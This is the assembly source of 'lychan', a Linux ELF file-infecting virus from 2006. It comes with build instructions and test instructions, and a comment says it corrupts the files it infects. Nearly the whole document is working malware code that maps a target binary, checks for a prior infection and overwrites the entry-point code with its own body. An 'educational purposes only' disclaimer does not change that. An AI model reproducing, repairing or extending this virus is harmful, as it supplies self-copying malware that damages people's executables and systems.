;-------------------------------------------------------------------------------------------
;lychan (c)opyright 2006 by lclee_vx
;
;
;lychan is a ELF infector on Linux system with the simple infection algorithm. 
;This is an simple example of an elf binary infection and tested on Red Hat 8.0
;
;To assemble it:
;    nasm -f elf -F stabs -g lychan.asm
;    ld -o lychan lychan.o
;    ./elfwrsec lychan
;
;Description: 
;    1. Get the elfwrsec tool by The King (c)
;
;    2. This lychan virus infection method is inspired of winux virus coded by benny/29A.
;       I will try to come out my own infection methods later, sigh.....forgive me because
;       I just spent 3 weeks to code this stuff. :p
;
;    3. This is just proof of concept that how to code the virus on linux, this virus
;       will copy itself into the elf files, unfortunately, its will corrupt the target files.
;       The bug still need to fix. :( !!
;
;    4. The virus just scan the elf file named "f13labs" in the current directory only.
;
;    5. if you want to test this virus, just rename any elf file in your linux system to "f13labs"
;       and put into same directory with virus "lychan" 
;
;
;That is about all folks. The code is heavily commented, so, it should be easy enough to follow.
;
;
;                                           Disclaimer
;                                          ------------
;THIS CODE IS MEANT FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR CANNOT BE HELD RESPONSIBLE FOR ANY
;DAMAGE CAUSED DUE TO USE, MISUSE OR INABILITY TO USE THE SAME
;
;Author		: lclee_vx
;Group		: F-13 Labs
;Web		: http://f13.host.sk
;Email		: lclee_vx@yahoo.com
;
;Credit		: Thanks go to Benny/29A, the algorithm mapped the virus into memory is cool
;              
;----------------------------------------------------------------------------------------------------

bits	32
global	_start

section	.text
	


_start:
	call	Delta
	
Delta:
	pop	ebp
	sub	ebp, Delta
	
	mov	edx, 07h
	mov	ecx, 04000h
	lea	ebx, [ebp+_start]
	and	ebx, 0FFFFF000h
	call	SYS_mprotect
	
	mov	edx, dword [ebp+MsgLength]		;Message Length
	lea	ecx, [ebp+Msg]				;Message
	mov	ebx, 01					;stdout
	call	SYS_write				;SYS.WRITE
	

	mov	ecx, 02					;O_RDWR
	lea	ebx, [ebp+TargetFile]			;load the target file
	call	SYS_open				;open the target file
	

	mov	ebx, eax				;ebx=file descriptor
	mov	dword [ebp+FileHandle], eax		;save 

;--------------------------------------------------------------------------------
;change file pointer of file ref-d by fd
;--------------------------------------------------------------------------------
	mov	edx, 2					;SEEK_END, add disp to end of file
	xor	ecx, ecx
	call	SYS_lseek
	

	xchg	eax, ecx				;ecx=size of file
	mov	dword [ebp+FileSize], ecx		;file size, save it
	mov	ebx, dword [ebp+FileHandle]		;ebx=FileHandle
	call	MapFile					;map the file in memory

	cmp	eax, -1					;error?
	je	near MapFail				;failed
	mov	dword [ebp+MapAddress], eax		;save the mapping address
	push	eax
	pop	esi					;esi=mapping address

	call	BeginInfect

OldEntry:
	call	SYS_exit
	
;-----------------------------------------------------------------------------------
;Start Infect the target file
;1. check the signature of ELF
;2. values of e_ehsize (elf header size), eh_entrypoint (entry point), eh_ph_count(ph number)
;   , eh_ph_entrysize (ph entry size)
;3. p_addr+p_memsz > e_entry
;-----------------------------------------------------------------------------------
BeginInfect:
	mov	eax, dword [esi]		
	cmp	eax, 0x464C457F				;ELF ?
	jne	near UnMap
	
	mov	edi, esi				;edi=map address
	movzx	eax, word [esi+28h]			;e_ehsize
	mov	ebx, dword [esi+18h]			;e_entry
	movzx	ecx, word [esi+2ch]			;e_phnum
	movzx	edx, word [esi+2ah]			;e_phentsize

	add	edi, eax				;edi=point to Program Table Header
	
CheckPhdr:
	mov	eax, dword [edi+0ch]			;p_addr(physical address)
	add	eax, dword [edi+14h]			;p_memsz (size of the segment in memory)
	cmp	ebx, eax				;e_entry < p_addr+p_memsz ?
	jl	GotPhdr					;less
	add	edi, edx				;add e_phentsize, another segment
	loop	CheckPhdr				;loop
	jmp	UnMap					;we failed, jump out

GotPhdr:
	mov	esi, dword [esi+18h]			;esi=e_entry
	mov	eax, dword [edi+08h]			
	sub	esi, eax				;esi=offset to entry code = e_entry-p_vaddr
	mov	ebx, esi
	add	esi, dword [ebp+MapAddress]		;esi=EIP
	mov	dword [ebp+OldEip], esi			;save it

;----------------------------------------------------------------------------------
;check infected already?
;----------------------------------------------------------------------------------
	mov	eax, dword [ebp+_start]
	cmp	dword [esi], eax
	jz	UnMap					;infected

;-----------------------------------------------------------------------------------
;check enough space for us to insert the virus? 
;-----------------------------------------------------------------------------------
	mov	eax, dword [edi+14h]			;p_memsz (size of the segment in memory)
	sub	eax, ebx				;p_memsz - offset to entry code
	mov	ecx, VxEnd - _start			;ecx = length virus
	cmp	eax, ecx
	jb	near UnMap				;segment too small

;-------------------------------------------------------------------------------------
;Creating the frame for us to insert code
;write the frame & virus
;-------------------------------------------------------------------------------------
	sub	esp, VxEnd - _start
	
	mov	edi, esp
	mov	ecx, VxEnd - _start
	rep	movsb

	mov	edi, [ebp+OldEip]
	mov	ecx, VxEnd - _start
	lea	esi, [ebp+_start]
	rep	movsb

;---------------------------------------------------------------------------------------
;Unmap
;---------------------------------------------------------------------------------------
	mov	ecx, dword [ebp+FileSize]
	mov	ebx, dword [ebp+MapAddress]
	call 	SYS_munmap
	

	mov	edx, VxEnd - _start
	mov	ecx, esp
	mov	ebx, dword [ebp+FileHandle]
	call	SYS_write
	
	
	add	esp, VxEnd - _start
	jmp	MapFail

UnMap:	
	mov	ecx, dword [ebp+FileSize]
	mov	ebx, dword [ebp+MapAddress]
	call	SYS_munmap
	

MapFail:
	mov	ebx, dword [ebp+FileHandle]
	call	SYS_close
	

OpenFail:
	ret

;------------------------------------------------------------------------------------
;This routine is for mapping the file in memory
;------------------------------------------------------------------------------------
MapFile:
	lea	esi, [ebp+MapArg]			;load the map structure
	mov	dword [esi+04h], ecx			;set the file size
	mov	dword [esi+10h], ebx			;set the file handle
	mov	ebx, esi				;ebx=Map structure address
	call	SYS_mmap				;start map to memory
	ret

;----------------------------------------------------------------------------------
;important routine to mprotect, write, call, open, mmap, munmap, exit
;----------------------------------------------------------------------------------
SYS_lseek:
	mov	eax, 19
	int	80h
	ret

SYS_write:
	mov	eax, 4
	int	80h
	ret

SYS_open:
	mov	eax, 5
	int	80h
	ret

SYS_mprotect:
	mov	eax, 125
	int	80h
	ret

SYS_mmap:
	mov	eax, 90
	int	80h
	ret

SYS_munmap:
	mov	eax, 91
	int	80h
	ret

SYS_close:
	mov	eax, 6
	int	80h
	ret

SYS_exit:
	mov	eax, 1
	int	80h
	ret

;---------------------------------------------------------------------------------
;Parameter
;----------------------------------------------------------------------------------
Msg		db	"Hello", 0ah, 0
MsgLength	dd	$-Msg

FileHandle	dd	00000000h
FileSize	dd	00000000h
MapAddress	dd	00000000h
OldEip		dd	00000000h

TargetFile	db	"./f13labs", 0

MapArg:
		dd	00000000h ;*_addr
		dd	00000000h ;_len	
		dd	00000003h ;_prot	
		dd	00000001h ;_flags
		dd	00000000h ;_fd	
		dd	00000000h ;_offset

VxEnd: